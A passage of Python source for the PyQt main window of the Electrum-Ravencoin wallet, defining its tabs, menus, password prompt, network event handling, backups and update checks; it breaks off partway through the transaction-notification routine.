from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, QPoint
from PyQt5.QtCore import QTimer, QRegExp
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton, )
import electrum
from electrum.gui import messages
from electrum import (keystore, ecc, constants, util, ravencoin, commands,
paymentrequest, lnutil)
from electrum.ravencoin import COIN, is_address, base_decode, TOTAL_COIN_SUPPLY_LIMIT_IN_BTC
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME,
InvoiceError)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput, RavenValue, script_GetOp)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException, LnInvoiceException
from .asset_workspace import AssetCreateWorkspace, AssetReissueWorkspace
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, RVNAmountEdit, FreezableLineEdit, FeerateEdit, PayToAmountEdit, SizedFreezableLineEdit
from .messages_list import UpdateDevMessagesThread
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog, HeaderTracker)
from .util import ButtonsTextEdit, ButtonsLineEdit, ComplexLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog
from ...assets import is_main_asset_name_good, is_sub_asset_name_good, is_unique_asset_name_good
from .qrreader import scan_qrcode
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25, 25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
# ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
# if wallet.has_lightning():
# self.wallet.config.set_key('show_channels_tab', True)
self.asset_blacklist = self.wallet.config.get('asset_blacklist', [])
self.asset_whitelist = self.wallet.config.get('asset_whitelist', [])
self.use_own_cb = QCheckBox(_('Force use own RVN'))
self.force_use_own = False
# Tracks sendable things
self.send_options = [] # type: List[str]
Exception_Hook.maybe_setup(config=self.config, wallet=self.wallet)
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self._cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.assets_tab = self.create_assets_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.messages_tab = self.create_messages_tab()
# self.channels_tab = self.create_channels_tab()
self.header_tracker = HeaderTracker()
self.history_tab = self.create_history_tab()
history_tab_widget = QWidget()
self.history_tab_layout = QVBoxLayout()
self.history_tab_layout.setAlignment(Qt.AlignCenter)
self.history_tab_layout.addWidget(self.header_tracker)
self.history_tab_layout.addWidget(self.history_tab)
history_tab_widget.setLayout(self.history_tab_layout)
tabs.addTab(history_tab_widget, read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.assets_tab, read_QIcon('tab_assets.png'), _('Assets'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name, default=False):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.messages_tab, read_QIcon("tab_message.png"), _("Messages"), "messages")
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
# add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QScrollArea()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
self.setMinimumWidth(640)
self.setMinimumHeight(400)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum-ravencoin.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self,
lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1) % wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self,
lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1) % wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded', 'asset_meta']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
# self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_(
"For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
self._update_check_thread = None
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum-Ravencoin {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
self._dev_notification_thread = None
if config.get('get_dev_notifications', True):
self._dev_notification_thread = UpdateDevMessagesThread(self)
self._dev_notification_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
# return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
# elif event == 'gossip_db_loaded':
# self.channels_list.gossip_db_loaded.emit(*args)
# elif event == 'channels_updated':
# wallet = args[0]
# if wallet == self.wallet:
# self.channels_list.update_rows.emit(*args)
# elif event == 'channel':
# wallet = args[0]
# if wallet == self.wallet:
# self.channels_list.update_single_row.emit(*args)
# self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
elif event == 'asset_meta':
pass
# self.reissue_workspace.refresh_owners(True)
# self.create_workspace.refresh_owners(True)
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
# self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
if not self.isMaximized():
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
if not self.isMaximized():
self.setGeometry(100, 100, 950, 550)
self.setMinimumSize(950, 550)
def watching_only_changed(self):
name = "Electrum Ravencoin Testnet" if constants.net.TESTNET else "Electrum Ravencoin"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]' % ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Ravencoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Ravencoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_hardware(self):
if not self.wallet.keystore or self.wallet.keystore.get_type_text()[:2] != 'hw':
return
if self.config.get('dont_show_hardware_warning', False):
return
msg = ''.join([
_("This is a hardware wallet."), '\n',
_("Mining to this wallet may cause you problems. If mining, ensure you make your mining payouts sporadic"), '\n',
_("or mine to an electrum software wallet and transfer to hardware.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Hardware Wallet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_hardware_warning', True)
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Ravencoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return False
backup_dir = self.config.get_backup_dir()
if backup_dir is None:
self.show_message(_("You need to configure a backup directory in your preferences"),
title=_("Backup not configured"))
return
try:
new_path = self.wallet.save_backup(backup_dir)
except BaseException as reason:
self.show_critical(
_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason),
title=_("Unable to create backup"))
return
msg = _("A copy of your wallet file was created in") + " '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d" % (i + 1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
#history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab, default=False):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), default)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.messages_tab, True)
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
# add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
if self.network and self.network.local_watchtower:
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
# Cannot be closed on mac; disabled for now
# tools_menu.addAction(_("&Log viewer"), self.logview_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction("&RVN Electrum Wiki", lambda: webopen("https://raven.wiki/wiki/Electrum"))
help_menu.addAction("&GetRavencoin.org", lambda: webopen("https://GetRavencoin.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(
QKeySequence.HelpContents)
# if not constants.net.TESTNET:
# help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('raven:%s?message=donation for %s' % (d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version") + " %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Ravencoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Ravencoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = RavenValue()
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
recv = ''
rvn = total_amount.rvn_value
assets = total_amount.assets
